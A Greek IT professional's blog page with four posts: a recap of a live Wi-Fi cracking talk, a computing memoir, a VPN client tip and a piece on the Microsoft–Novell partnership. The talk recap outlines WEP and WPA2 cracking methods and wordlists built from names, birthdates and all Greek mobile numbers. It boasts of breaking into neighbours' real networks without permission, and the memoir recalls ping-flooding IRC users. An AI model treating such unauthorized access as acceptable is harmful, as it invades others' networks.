Jump to content

Blackman

Members
  • Posts

    1970
  • Joined

  • Last visited

  • Days Won

    15

Blog Entries posted by Blackman

  1. Blackman
    Διάβασα το άρθρο του Βαγγέλη και δεν κρατήθηκα. Έπρεπε να γράψω και εγώ. Να δώσω και εγώ την δική μου εικόνα και να ευχαριστήσω πολύ κόσμο για αυτό το event. Αρχικά να ευχαριστήσω τους διοργανωτές και δη τα μεγάλα κεφάλια του autoexec.gr (κοινώς moderators) που μου έκαναν την τιμή και με κάλεσαν σε αυτό το τόσο μεγάλο event. Ήταν το πρώτο μου και ευελπιστώ να ακολουθήσουν και άλλα.

    Στην συνέχεια να ευχαριστήσω όλους όσους ήρθαν και παρακολούθησαν την εκδήλωση αυτή και η αίσθηση πραγματικά ήταν ξεχωριστή. Όπως ανέφερα, ήταν η πρώτη μου παρουσίαση, όχι γενικά, αλλά σε τέτοιο κοινό. Πρώτη φορά μίλησα σε συναδέλφους μου και φυσικά το υψηλό επίπεδο των ακροατών μου έδωσε ένα ξεχωριστό συναίσθημα.







    Τέλος να ευχαριστήσω και τους υπόλοιπους ομιλητές, γιατί απλά είναι αυτοί που είναι. Ξεχωριστά άτομα ο καθένας τους. Καθώς ακόμα και τα υπόλοιπα παιδιά, behind the scenes για την εξαιρετική δουλειά τους. Το να ετοιμάζουν όλα αυτά είναι πραγματικά κάτι το ξεχωριστό. Νομίζω όλους τους τους ανέφερε ονομαστικά ο φίλος Βαγγέλης(την Παρασκευή στήναμε μέχρι το πρωί. Πολύ ξενύχτι λέμε)

    Τέλος, last but not least, όπως λένε και οι φίλοι μας οι Αμερικάνοι, πολλά ευχαριστώ στον έτερο συνπαρουσιαστή Γιώργο ‘gspiliot’ Σπιλιώτη για την ωραία ομάδα που φτιάξαμε. Ενώ ο χώρος στο ξενοδοχείο Imperial έπαιξε σημαντικό ρόλο για την επιτυχία της εκδήλωσης.

    Τα πράγματα για εμάς ήρθαν τόσο απλά, όσο ένα τηλεφώνημα…

    -Μπορείς να σπάσεις live ασύρματο δίκτυο;

    -Εύκολα…υπό προϋποθέσεις και ότι πρωτόκολλο θες.

    -Μου αρκεί…

    κάπως έτσι πήραμε το πρώτο οκ, για την παρουσία μας και εφόσον είχαμε δείξει κάποια δουλειά πάνω στο αντικείμενο (όσοι παρακολουθούν το Blog μου καταλαβαίνουν τι εννοώ).

    Η δουλειά για εμάς ξεκίνησε από τον Ιούλιο. Συνεχείς δοκιμές για να hackάρουμε διάφορα δίκτυα και περισσότερο εκεί που δουλεύω, στην Αγία Παρασκευή. Ναι, για τις δοκιμές μας ίσως κάποιος από εσάς να περάσατε από το δικό μας σκανάρισμα και αν είχατε και WEP, τότε συνδεθήκαμε σε εσάς. Στις προσπάθειες μας, σπάσαμε γύρω στα 7 WEP από τα 8 που βρήκαμε εκείνη την περίοδο(ένα δεν είχε καλό σήμα), ενώ επίσης δύο με WPA2 με χρήση password list. (όλα αυτά για να έχουμε real life tests και όχι σε κατάσταση lab)

    Στην συνέχεια, οι επόμενες επαφές έγιναν μαζί με τον Γιώργο τον Σεπτέμβρη, όπου αποφασίσαμε ότι θα δείξουμε και prehashed lists. Αρχικά πήγαμε να κατεβάσουμε μία λίστα που υπάρχει διαθέσιμη στο Internet και είναι μεγέθους 33GB, αλλά στην πορεία αποφασίσαμε να φτιάξουμε δικές μας για να γίνει και πιο εντυπωσιακό το όλο κατόρθωμα. Μας πήρε ΔΥΟ ΜΗΝΕΣ για να ολοκληρωθεί η παραγωγή αυτών των δύο prehashed lists. Δύο λίστες φυσικά που θα γίνουν ανάρπαστες μόλις τις βγάλουμε διαθέσιμες για κατέβασμα.

    Με τι ασχοληθήκαμε; Όσοι παρακολούθησαν γνωρίζουν, αλλά κάποιοι ίσως να μην κατάλαβαν καλά. Η πρώτη και πιο μικρή λίστα, ήταν ΟΛΑ τα ανδρικά ονόματα με συνδυασμούς της ημερομηνίας γέννησης (πχ giwrgos1711980 ή Vangelis1956 ή όποιος άλλος συνδυασμός του ονόματος με κεφαλαία-πεζά και τους σχετικούς τρόπους γραφής καθώς και όλους τους τρόπους γραφής της ημερομηνίας). Ο μοναδικός περιορισμός ήταν ότι βάλαμε ημερομηνίες μετά το 1940.

    Η δεύτερη prehashed list ήταν και η πιο δυνατή, καθώς πολύ απλά φτιάξαμε μία λίστα με ΟΛΑ ΤΑ ΚΙΝΗΤΑ ΤΗΛΕΦΩΝΑ ΤΗΣ ΕΛΛΑΔΑΣ. Ναι, σε αυτή την λίστα θα βρείτε τα κινητά σας και όποιου γνωστούς σας. Η συγκεκριμένη λίστα είναι ένα αρχείο 2GB και γράφτηκε σε Perl ώστε να γίνει ο υπολογισμός όλων των τηλεφώνων. Το σκεπτικό; Απλό. 69ΧΧΧΧΧΧΧΧ όπου Χ, όλα τα νούμερα από την αρχή. Φυσικά βγάλαμε και κάποια εκτός όπως το 691ΧΧΧΧΧΧΧ.

    Με το παραπάνω ουσιαστικά ολοκληρώσαμε μετά από 3 μήνες προετοιμασίας την δουλειά μας και αφοσιωθήκαμε στην παρουσίαση αυτών.

    Για να δούμε τι είδατε στην παρουσίαση μας.



    Τι είναι WEP, WPA, WPA2 Personal/Enterprise

    Πόσο εύκολα μπορεί κάποιος να κάνει την ζημιά, χωρίς ιδιαίτερο εξοπλισμό. Δείξαμε εκεί ένα Asus 701 4G (160€ πωλείται πλέον), το οποίο δεν είχε καν φορτωμένο το σχετικό λογισμικό, αλλά όλα μέσω ενός Live USB stick 1GB με Backtrack 3.

    Ποιο είναι το σκεπτικό που ακολουθείται για να γίνει το wifi hacking (assosiation, deauthentication, ARP capture κλπ)

    Με τι εργαλεία μπορεί να γίνει αυτό. Εμείς παρουσιάσαμε με aircrack-ng πάνω σε Backtrack 4

    Τι να προσέχετε και τι να αποφεύγετε.

    Τι χρειάζεται να έχετε αν θέλετε να δοκιμάσετε εσείς. Περιορισμούς από την ασύρματη κάρτα δικτύου (chipset, drivers κλπ)

    Είδαμε Live Hacking σε WEP και δύο φορές σε WPA2 με password list και με prehashed list.

    Ποια είναι η καλύτερη λύση, ειδικά για επιχειρησιακά περιβάλλοντα.
    Η ροή ήταν η εξής: Τι είναι wifi & τα πρωτόκολλα –> Αλήθειες και ψέματα για wifi hacking –> ανάλυση WEP hacking –> Live WEP hacking –> ανάλυση WPA2 hacking –> live WPA2 hacking (2 τρόποι) –> Τρόποι προστασίας –> WPA 2 Entrerprise (WS2008, NAP, Radius)

    Το πιο εντυπωσιακό της παρουσίασης ήταν όταν σηκώσαμε τον Βαγγέλη και έβαλε το δικό του password στο router, δίνοντας του τις δύο επιλογές που θα έπρεπε να επιλέξει για password (βάση των prehashed lists που είχαμε) και στην συνέχεια εφόσον μαζέψαμε τα σχετικά πακέτα το σπάσαμε σε περίπου δύο λεπτά με την χρήση της πρώτης prehashed λίστας. Ενώ να αναφέρω ότι το WEP που σπάσαμε ήταν ενός δικτύου που έτυχε να υπάρχει στην περιοχή(!!!), ενώ η περίπτωση του σπασίματος με password list έγινε έχοντας συμπληρώσει εμείς την σχετική λέξη σε μία αντίστοιχη λίστα.

    Οι γνώστες πάνω σε ασύρματο hacking και των σχετικών πρωτοκόλλων νομίζω εκτίμησαν περισσότερο το live σπάσιμο, τόσο του WEP, αλλά περισσότερο του WPA2. Οι χρόνοι για να σπάσει ένα κλειδί με ονόματα και ημερομηνίες, όποια και να ήταν αυτά, είναι στα περίπου δύο λεπτά. Ενώ στην περίπτωση που ο ‘στόχος’ χρησιμοποιεί σαν κλειδί το κινητό του, με την άλλη λίστα χρειάζεται μέχρι δέκα λεπτά.



    Η διαφορά μεταξύ μίας password list και μίας prehashed, είναι ότι για κάθε 1000 (χίλια) passwords στην πρώτη περίπτωση χρειάζεται 15 δευτερόλεπτα, ενώ στην περίπτωση prehashed list, θέλει 1 δευτερόλεπτο για να διαβάσει 100000 (εκατό χιλιάδες) passwords.

    Οπότε να ξεκαθαρίσουμε κάτι σε όποιους δεν το κατάλαβαν την ώρα της παρουσίασης.



    Η λίστα με τα κινητά δεν ήταν με τα κινητά όσων ήταν στην παρουσίαση, αλλά ΟΛΗΣ ΤΗΣ ΕΛΛΑΔΑΣ (εννοώντας όλων το ελληνικών εταιρειών παροχής κινητής τηλεφωνίας). (Πρέπει να το ανέφερα πολλές φορές αυτό ε;;

    Όταν τρέχαμε το COWPUTTY (για να σπάσουμε το WPA2 με prehashed) όταν βλέπατε να αλλάζουν νούμερα στο πλάι, ήταν ανά εκατοντάδες χιλιάδες. (Η φωτογραφία πιο πάνω είναι από προσπάθεια αναζήτησης απλής password list)






    Και ενώ μέχρι εδώ και ότι κάναμε με τον Γιώργο χρησιμοποιούσαμε Linux και ο Κλαδάκης είχε βγάλει τις κούκλες Voodoo, μήπως πάθουμε κάτι, ήρθαμε από μόνοι μας να αυτοσωθούμε από τα νύχια του. Ο λόγος είναι ότι η πιο αξιόπιστη λύση αυτή την στιγμή είναι με την χρήση WPA2 Enterprise, κάτι που δίνει ο Windows Server 2008 και στήνεται και σχετικά εύκολα.



     

    Φυσικά το όνομα… HACK MY SPACE… δεν ήταν για να δείξουμε ότι μπορούμε να χακάρουμε το Myspace, αλλά τον προσωπικό χώρο του καθενός.

    Σε αυτό το σημείο να έρθω να παραπονεθώ για αυτόν τον Μέρφυ αλλά και τους νόμους του και να ζητήσω συγνώμη για τις δύο περιπτώσεις που τα πράγματα δεν δούλεψαν όπως έπρεπε. Αλλά αυτό είναι το όμορφο του LIVE, το ότι το κάνει αυθεντικό. Στην πρώτη περίπτωση προσπαθώντας να κάνουμε injection στον WEP δίκτυο, η κάρτα του μηχανήματος μας έβλεπε άλλο κανάλι από αυτό που θα έπρεπε και του είχαμε δηλώσει. Πρόβλημα που κλασικά με μία επανεκκίνηση διορθώθηκε.

    Το δεύτερο έγινε όταν πήγαμε να σπάσουμε το WPA2 με prehashed λίστα με τον κωδικό που είχε βάλει ο Βαγγέλης. Εκεί το πρόβλημα ήταν ότι ο client δεν είχε κάνει σωστά assosiate με το wifi spot (το έβλεπε unsecure), οπότε τότε βάλαμε τον φίλο μας Βαγγέλη να μας πληκτρολογήσει πάλι τον κωδικό του ώστε ο client να συνδεθεί σωστά και εμείς να πάρουμε τα σωστά πακέτα.

    Νομίζω ότι ήμασταν οι μόνοι που ολοκληρώσαμε εντός χρόνου (ε κ. Κλαδάκη και έχοντας δείξει όλα τα πράγματα που θέλαμε. Όχι ότι θα λέγαμε όχι αν μπορούσαμε να σας πούμε αναλυτικά τον τρόπο γραφής των εντολών και την λογική σειρά που ούτως η άλλως αναλύσαμε.

    Ελπίζω να σας άρεσε και να ήσασταν αρκετά αυστηροί στις βαθμολογίες σας με εμάς. Να αναφέρω γιατί κάποιοι με ρώτησαν… στην εισαγωγή μας όπου χρησιμοποίησα το σφυρί για να σπάσω το wifi, ναι…το βαρούσα κανονικά και όχι εικονικά.

    Από εκεί και πέρα περιμένω τις ερωτήσεις σας σε αυτό το Blog Post και φυσικά προτάσεις που θα θέλατε να δείτε σε μελλοντικά blog posts μου ή του gspiliot.

    Σας ευχαριστώ όλους και πάλι.
  2. Blackman
    Θυμάμαι όταν ήμουν μικρός πως είχαν νιώσει όταν είχα έρθει πρώτη φορά σε επαφή με ένα Commodore. Με είχαν πάρει η γιαγιά με τον παππού μαζί τους εκείνο το καλοκαίρι και οι γείτονες τους είχαν παιδιά, που αν και μεγαλύτερα από εμένα με φώναζαν να παίζουμε μαζί. Δεν με ένοιαζε που δεν με άφηναν να παίξω, λόγο ότι ήμουν αρκετά μικρός, με ένοιαζε που έβλεπα.

    Πέρασε λίγο διάστημα από τότε μέχρι να αποκτήσω και εγώ ένα δικό μου υπολογιστή που δεν ήταν άλλος από έναν Amstrad 6128 με πράσινη οθόνη. Τότε ένιωθα πολύ ωραία που έγραφα εντολές, που δεν ήταν κάτι το ιδιαίτερο και διάβαζα και περιοδικά του χώρου (Computer για όλους, Pixel, PC Master) και χανόμουν. Στην συνέχεια ήρθε να μπει στην ζωή μου αρχικά ένας 8086 και μετά ο υπέρτατος 80286 για την εποχή, με 10mb σκληρό δίσκο και 512kb μνήμη. Ήμουν θεός… με himem, έπαιζε τα πάντα και μιλάμε για εποχή MS-DOS 3.01



    Την συνέχεια την ξέρουμε όλοι, με την έλευση των Windows και την επιτυχία των 3.11. Δεν είχα πολύ επαφή τότε, δεν μου άρεσε το ποντίκι. Εγώ ήθελα να γράφω, να νιώθω ότι εγώ λέω στο μηχάνημα τι να κάνει και όχι ένα πλήθος εντολών πίσω από το δικό μου κλικ. Μαζί με τα 3.11 ήρθα και σε επαφή με το Unix. Ωραίες αναμνήσεις… στην συνέχεια πήγα στην σχολή και είχαμε windows 95 και Unix. Τι να διαλέξω να ‘παίξω’ εκείνη την περίοδο; Μα τι άλλο, Unix φυσικά. Αυτό έγινε λίγο από εγωισμό, καθώς τότε θυμάμαι στο Lab, παίζαμε Doom 2 και μία άλλη φορά που παίζαμε Duke Nukem δίκτυο με τα υπόλοιπα παιδιά του τμήματος και είχε έρθει αυτός το σπαστικός ο γυαλάκιας από το τελευταίο έτος να μας κόψει τα connections από τον server.



    Έκατσα και διάβασα λίγο, έμαθα μερικές εντολές και την επόμενη φορά του την έφερα εγώ. Να είναι καλά και ένα συμφοιτητής που είχα τότε, με ψευδώνυμο Turrican (ιστορικό παιχνίδι) που με βοήθησε σε αυτά που έκανα τότε. Η συνέχεια είχε πολύ από… Microsoft. Τι άλλο φυσικά. Από τότε θυμάμαι που όλοι κατηγορούσαν την μονοπωλιακή πολιτική της Microsoft, αλλά όλοι δούλευαν με Windows.



    Ναι, ήταν o μπαμπούλας από τα παραμύθια που ήρθε να τα φάει όλα. Έτσι ήταν και στο δικό μου μυαλό και όσο δούλευαν στα συστήματα της και όσο ‘έτρωγα’ τις αξιολάτρευτες Blue Screen of Death, απανωτά από Windows 95, Windows 98, Windows Millennium (το υπέρτατο blue screen), Windows 2000, έβρισα και έλεγα τα χειρότερα για την Microsoft. 

    Κάπου εκεί την εποχή των Millennium σε ένα παλιό PCάκι που είχα φόρτωσα linux. Suse πρέπει να ήταν και θυμάμαι πόσο καιρό το έστηνα, προσπαθώντας να βρω drivers. To αποτέλεσμα όμως με έκανε και ένιωθα τόσο ικανοποιημένος, αλλά συνάμα κουρασμένος από την όλη διαδικασία.

    Ωραία πλέον είχα να λέω Linux και πάλι Linux… αλλά πάλι τα περισσότερα πράγματα στα Windows τα έκανα. Εκείνη την εποχή ειδικότερα οι δυνατότητες όμως που σου έδινε η κονσόλα ενός Unix/Linux συστήματος ήταν απλά… αλλού. Είχα γίνει κακό παιδάκι τότε… η πρώτη μου επαφή με το Internet είχε έρθει κάπου το 1993 και τα επόμενα χρόνια ήμουν χωμένος σε όλα τα IRC chatrooms (είχα ζήσει και τους IRC servers της Microsoft). Μιλάμε για περίοδο με πολλά vulnerabilities, nukes, DDOS attacks, Trojans κλπ, έδιναν και έπαιρναν ειδικά στο IRC. Με Linux, απλά δεν έπεφτες και τους έριχνες εύκολα. Τι πιο σπαστικό από να τσακώνεσαι με κάποιον online και εκείνος να σου κόβει την σύνδεση. Ε τι άλλο να γίνει με τις pstn και τα modems; Μία αξιοπρεπής γραμμή, μερικά έως πολλά pings και τσουπ… disconnected. Δεν θα ξεχάσω που γύρω στο 2001 έκανα δοκιμές από το σπίτι στους servers της δουλειάς μου τότε (Windows NT SP4). ( Όχι δεν κατάφερα να κάνω τίποτα)

    Μετά ήρθαν τα Windows XP και τότε μάλλον τα πράγματα πήραν άλλη τροπή. Σε όλο τον κόσμο η Microsoft δεχόταν την μία μήνυση μετά την άλλη για την μονοπωλιακή πολιτική της, αλλά το νέο σύστημα της ήταν πιο σταθερό. Full Windows XP ο κύριος από εδώ και παιχνίδια, πολλά παιχνίδια αφού είχαμε DirectX σε τρομερά επίπεδα για την εποχή. Το linux δεν υποστήριζε DirectX (ούτε υποστηρίζει), οπότε no fancy graphics. Κάποια στιγμή ήρθα σε επαφή με το Ubuntu. XP στο ένα PC, Ubuntu στο άλλο και τότε ξεκίνησαν τα καλά. Είχα βάλει σκοπό ντε και καλά να έχω πλήρες λειτουργικό δίκτυο και με τα δύο συστήματα. Τα windows να δουν το linux; ΧΑΧΑΧΑΧΑΧΑ… ακόμα γελάω. Από την άλλη πλευρά όμως, είχα SAMBA. Έβλεπα shares, μετέφερα αρχεία, έβλεπα ταινίες, είχα remote desktop και διάφορα άλλα. Γενικότερα το linux είχε διάφορα στοιχεία τα οποία τα είδα αρκετά αργότερα στα Vista και πλέον στα 7. User Account Control το είπε η Microsoft, αλλά στο Linux είχαν άλλα πριν καιρό, sudo το λένε στο Ubuntu. Εφέ στα παράθυρα και Dreamscene η Microsoft, αλλά εδώ και κάτι χρόνια παίζουμε με combiz στο linux.



    Αρκετά κοινά στοιχεία τα τελευταία χρόνια και αυτό γιατί; Γιατί απλά, όπως το βλέπω εγώ, η Microsoft έβαλε μυαλό. Όχι ότι δεν θέλει να τα φάει όλα, απλά θέλει πλέον μερίδιο και από εκεί που δεν έτρωγε. Μία σκέψη που έπρεπε να την είχε κάνει καιρό και φυσικά μιλάμε για Business. Βλέπω τις κοινότητες του Linux να αντιδρούν όταν έμαθαν ότι η Microsoft ανοίγει τον κώδικα της, ότι έδωσε 20000 γραμμές στην Open Source κοινότητα, ότι έρχεται κοντά στους σκληροπυρηνικούς Linuxάδες.

    Η Microsoft από το 2003 αποφάσισε να μπει στον χώρο του Open Source και του Interoperability.  Η σκέψη είναι απλή. Δεν λέει σε κανένα πλέον να μην χρησιμοποιήσει linux, αλλά του λέει να δει πόσο αρμονικά δουλεύει με άλλα δικά της προϊόντα το linux σύστημα που ο πελάτης χρησιμοποιεί. Ο Linus Torvalds, ο άνθρωπος που δημιούργησε τον πυρήνα του Linux, έδειξε ιδιαίτερα θετικός στην νέα στάση της Microsoft. Άτομα που δούλευαν σε τρίτες εταιρείες ειδικευμένοι σε άλλα συστήματα, εργάζονται πλέον για την Microsoft στο αντίστοιχο κομμάτι του Interoperability. Άτομα που ήταν χρόνια απέναντι από την Microsoft, βρέθηκαν να εκφράζουν τον ενθουσιασμό τους για την νέα πορεία που έχει πάρει πλέον η εταιρεία.

    Βρίσκομαι πλέον εν έτη 2009, σε μία κατάσταση bisexual σε σχέση με τους υπολογιστές. Ναι, χρησιμοποιώ ακόμα και τα δύο συστήματα και με την έλευση της τεχνολογίας virtulization, μιλάμε για system orgies. Domain Controller WS2008 r2, με Ubuntu, Windows XP, Windows 7, Suse, Mint κ.α., σε ανελέητες δοκιμές με sharepoint server 2007, SCCOM και διάφορα άλλα. Ωραία πράγματα. Και οι δύο πλευρές έχουν μεγαλώσει. H Microsoft ίσως να βρίσκετε στην πιο ισχυρή θέση από ποτέ, δείχνοντας πλέον ένα πραγματικά πιο ανθρώπινο πρόσωπο, την ίδια ώρα που η Open Source κοινότητα αυξάνεται συνεχώς και δυναμώνει.



    Ξέρω πλέον ότι δεν μπορώ να κάνω εύκολα και ‘κακό’ από Linux σε ένα σύστημα Windows, αλλά ξέρω ότι πλέον έχω εγκατεστημένο antivirus στον υπολογιστή μου που έχει linux. Παλιά αυτό ήταν ανέκδοτο. Στο εργασιακό κομμάτι, δεν μπορώ να συστήσω τίποτα άλλο, από Microsoft, στο σπίτι όμως και ανάλογα τις απαιτήσεις συνιστώ Linux. Μάλλον θα περάσει καιρός, μέχρι να δούμε κάτι αντίστοιχο με τα repositories που έχουν τα linux συστήματα, όπου κατεβάζεις ότι θες τσάμπα, όποτε το θες.

    Πριν λίγα χρόνια έκανα μία έρευνα αγοράς, ώστε να δω αν συνέφερε να βάλω linux σε κάποια clients για να μειωθεί το κόστος. Η σκέψη αυτή ήταν γιατί οι συγκεκριμένοι υπολογιστές ήταν μόνο για Internet, email και office. Στην αναζήτηση μου ήρθα σε επαφές με εταιρείες που υποστηρίζουν linux συστήματα και εγκαταστάσεις για να δω τι γίνεται. Τελικά κατέληξα ότι το να το κάνεις μόνος σου είναι τσάμπα, αλλά αν θες να κάνεις κάτι σε εργασιακό επίπεδο πρέπει να πληρώσεις το support και σε αυτή την κατάσταση είναι που έρχεται μία ή άλλη. Που πάμε καλύτερα για την άλλη, που είναι και πιο σίγουρο και έχει και υποστήριξη από την μαμά Microsoft. Αλλά αυτό και πάλι είναι προσωπική άποψη.

    Πάντως για τους φίλους του Open Source, να γνωρίζουν ότι πλέον υπάρχει και MS-PL (Microsoft Public License) και περισσότερο οι developers είναι αυτοί που μπορούν να έχουν άμεση επαφή με αυτό το κομμάτι. Οι υπόλοιποι πρέπει να περιμένουμε εκείνους, για να έχουμε κάτι απτό, το οποίο θα δείξει στην πορεία του χρόνου.

    Ο καιρός περνάει και οι αλλαγές είναι πολλές και συνεχόμενες. Από την εποχή που διαμορφώναμε το autoexec.bat μαζί με το config.sys, μέχρι να φτάσουμε στην εποχή του System Center και του Exchange 2010.



    Την εποχή που μέναμε κολλημένοι σε μία οθόνη παίζοντας Monkey Island, για να περάσουμε από το Phantasmagoria και να φτάσουμε τώρα στο World of Warcraft και το Resident Evil. Από το DOS, σε Solaris, σε Windows, σε Linux, σε Mac OS πλέον βρισκόμαστε σε μία κατάσταση… παγκοσμιοποίησης. Τα πάντα μπορούν να δουλέψουν μεταξύ τους και πλέον αρμονικά σε θεμιτό βαθμό.









    Είμαι βέβαιος ότι ξύπνησα αναμνήσεις σε πολλούς και σίγουρα αρκετοί θα θέλατε να συζητήσουμε πράγματα πάνω σε αυτό και για το παρελθόν. Θα δώσουμε ραντεβού στο ITproconnections τον Νοέμβρη. Be there.<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />



     

    Μερικά ενδιαφέροντα links.



     http://www.retromaniax.gr/


    http://elkosmas.gr/2009/07/24/linus-torvald-no-ms-hate/


    http://www.opensource.org/licenses/ms-rl.html


    http://www.cmswire.com/cms/web-development/taking-a-closer-look-at-microsofts-mspl-open-source-license-004248.php


    http://www.microsoft.com/resources/sharedsource/default.mspx


    http://weblogs.asp.net/scottgu/archive/2008/01/16/net-framework-library-source-code-now-available.aspx


    http://tips.developersvoice.com/bsd-or-gpl-choosing-an-open-source-license.html


    http://www.interoperabilitybridges.com/



     


     


     
  3. Blackman
    Για όσους είναι κάτοχοι Cisco router, πολύ πιθανόν να έχουν υλοποιήσει VPN και να έχουν προμηθευτεί το Cisco VPN Client, για να κάνουν αυτή την δουλειά. Μία διαδικασία που δεν χρειάζεται να στείνεις κάποιον VPN server, καθώς με την κατάλληλη παραμετροποίηση την λύση την έχουμε μέσω του ίδιου του router.
    Έτσι στην εταιρεία που εργάζομαι, σε όλα τα laptops βάζαμε το σχετικό Cisco VPN client και έχοντας ρυθμίσει τα απαραίτητα (username & password) ο εκάστοτε χρήστης συνδεόταν στο εταιρικό δίκτυο. Τα πράγματα αρκετό καιρό τώρα δεν προχωρούσαν όπως θα έπρεπε. Καθώς ο Cisco VPN client είναι αποκλειστικά για 32bit συστήματα και ΔΕΝ ΛΕΙΤΟΥΡΓΕΙ ΣΕ 64bit συστήματα.
    Η λύση που δίνει η Cisco, λέγεται AnyConnect VPN Client και είναι φτιαγμένος για να παίζει εύκολα στα 64bit συστήματα. Ωραία θα πει κάποιος, υπάρχει λύση, οπότε που είναι το πρόβλημα; Το πρόβλημα εστιάζεται στο ότι εάν έχετε ήδη υλοποίηση με κάποιο router και δουλεύετε το Cisco VPN client, το AnyConnect VPN Client πιθανότατα να μην παίξει σε εσάς. Το 64bit πρόγραμμα βλέπεται παίζει μονάχα σε ASA (Adaptive Security Appliance) και όχι σε άλλου τύπου router της Cisco. Δηλαδή όσοι έχετε το επονομαζόμενο PIX (Private Internet Exchange Firewall) δεν θα καταφέρεται ποτέ να συνδεθείτε με VPN στο σύστημα σας. Τι σημαίνει αυτό; Απλά…θα πρέπει να αλλάξετε router!!!!
    Οπότε σε αυτή την διαδικασία ξεκίνησα αρκετό καιρό τώρα να ψάχνω λύσεις που θα μου έδιναν συνδεσιμότητα με την εταιρεία μέσω 64bit συστήματος. Λύσεις υπάρχουν διάφορες, όπως το OpenVPN και άλλες. Το πρόβλημα όμως ήταν ότι σε όλες τις σχετικές λύσεις θα έπρεπε να γίνει κάποια εγκατάσταση-παραμετροποίηση σε κάποιο μηχάνημα (server ή client) για να κατάφερνα αυτό που ήθελα.
    Τελικά λύση υπάρχει και είναι πολύ πιο εύκολη. Τόσο εύκολη που απλά κάνεις Import το σχετικό .pcf (profile file) και παίζεις. Η λύση είναι ένας Universal IPsec VPN client που ονομάζεται NCP Secure Entry Client και όπως μπορείτε να δείτε αναφέρεται ότι είναι “First IPsec VPN Client Suite for Windows 7 in the world”. Μπορείτε να το δοκιμάσετε για 30 ημέρες σε full έκδοση και στην συνέχεια εάν σας κάνει να το αγοράσετε με κόστος 120€.
    Αξίζει να σημειωθεί ότι υπάρχουν και οι εξής client:
    NCP Secure Entry Symbian Client (κόστος 69€)
    NCP Secure Entry Windows Mobile Client (κόστος 69€)
    Σε αυτή την περίπτωση το μοναδικό πράγμα που έκανα ήταν Import το pcf αρχείο στο πρόγραμμα αυτό και τέλος. Η διαδικασία μου πήρε 1 δευτερόλεπτο και το σύστημα έπαιξε απροβλημάτιστα. Δεν έστησα τίποτα άλλο, δεν παραμετροποίησα τίποτα απολύτως. Απλά χρησιμοποίησα το συγκεκριμένο πρόγραμμα με το pcf αρχείο που είχα.
    Πλέον θέλω να δοκιμάσω και τους δύο clients για τα κινητά για να δω το πόσο καλά λειτουργούν. Μόλις το κάνω και αυτό θα ενημερώσω αντίστοιχα.
  4. Blackman
    Ήταν πριν τρία χρόνια όταν η Microsoft ανακοίνωσε την συνεργασία της με την Novell. Στο άκουσμα του παραπάνω όλοι κατάλαβαν ότι όλα κινούνται γύρω από την επιχειρηματική λογική. Τι σημαίνει αυτό; Ότι όλα είναι Business baby…
    Δύο εταιρείες που πολλές φορές είχαν έρθει σε ανοιχτή κόντρα, κυρίως για την μονοπωλιακή πολιτική της Microsoft, ήταν πλέον συνεργάτες. Τι έγινε όμως για να φτάσουμε ως εδώ; Η απάντηση είναι… όλοι εμείς. Πελάτες με περίπλοκες εγκαταστάσεις, με windows & linux λειτουργικά, με αρκετό open source και πολλά πολλά άλλα.
    Πολλές εταιρείες αποφάσιζαν να χρησιμοποιήσουν πχ έναν Linux email server, χωρίς όμως ποτέ να υπολογίσουν το όποιο κόστος για να καταφέρουν όλο το παραπάνω να δουλέψει με το υπόλοιπο δίκτυο. Έτσι είχαμε εγκαταστάσεις παρατημένες, γιατί ο πρώην admin ήξερε να χρησιμοποιεί linux, αλλά ο νέος έχει γνώσεις για Exchange και το αφεντικό δεν θέλει να γίνει migration (άλλη περίπτωση αυτή) αλλά το σύστημα να δουλεύει. Ο νέος admin στην συνέχεια έχει γίνει μοναχός στο Άγιο Όρος από τις προσευχές για να μην πάθει τίποτα ο mail server.
    Σε αυτό το σημείο ήρθε η συνεργασία της Microsoft με την Novell. Έτσι συμφώνησαν να αναπτύξουν προϊόντα σε ανοιχτά πρότυπα, έτσι ώστε όλοι εμείς να μην ανησυχούμε στο πως μπορούμε να δουλέψουμε διαφορετικές πλατφόρμες, ενοποιημένες σε ένα σύστημα.
    Η αρχική συνεργασία των δύο ήταν πάνω στα εξής 4: Virtualization,Standards Based Systems Management, Standards Based Identity and Federation, και Document Format Compatibility. Στην συνέχεια η συνεργασία προχώρησε περεταίρω και στα εξής 3: Moonlight, Linux Management for MS System Center, και Windows Accesibility.
    Virtualization (που είσαι Hyper-Vaggelaki;)
    Η συνεργασία σε επίπεδο Virtualization είχε να κάνει με το να εκμεταλλευτούν και οι δύο εταιρείες τον virtualization Hypervisor της άλλης (ένα χιαστί πράγμα δηλαδή). Αυτό έγινε εφικτό εφαρμόζοντας ένα σετ από VM adapters σχεδιασμένους για την επικοινωνία των XEN Visor και Windows Hyper V. Αυτοί οι λεγόμενοι Hyper-call adapters, μαζί με αντίστοιχους drivers για το storage και τις σχετικές συσκευές, μπήκαν σε ένα πακέτο και δόθηκαν στους πελάτες ως Linux Integration Components (Download). Αυτά τα components μπορεί κάποιος να τα κατεβάσει και να τα βάλει στο Guest λειτουργικό, όπου στην συνέχεια με μία απλή επανεκκίνηση ο χρήστης μπορεί να έχει όλα τα εξτρά (“additional performance of being and enlightened or para-virtualized guest” όπως τα αναφέρει η MS). Φυσικά στην περίπτωση μας, δεν μιλάμε γενικά για Linux, αλλά πιο συγκεκριμένα για το SUSE Linux το οποίο και υποστηρίζει η Novell και ουσιαστικά γίνεται το μοναδικό Linux λειτουργικό που υποστηρίζεται επίσημα στον Hyper-V. Πρόσφατα, η Microsoft προσέφερε στην κοινότητα του Open Source τα συγκεκριμένα components μέσω του GPL V2 License (όπου έχετε ξαναδιαβάσει και σε αυτό το blog).
    Το τελευταίο διάστημα τα πράγματα προχωράνε σε λύση Virtualization V2. Το μεγάλο ατού σε αυτό, είναι ότι πλέον το SUSE Linux όχι απλά υποστηρίζεται στον Windows Server 2008 R2, αλλά διατυμπανίζουν πλέον και την δυνατότητα του Live Migration. Που φτάσαμε; Πλέον όλοι θα μπορείτε να κάνετε ‘βόλτες’ από μηχάνημα σε μηχάνημα χωρίς downtime. (Που είσαι ρε Βαγγέλη Με αυτό τον τρόπο η MS κατάφερε να κλείσει το κενό που είχε με τον κύριο αντίπαλο της σε θέματα virtualization, που λέγετε VMWARE.

    Διαχείριση
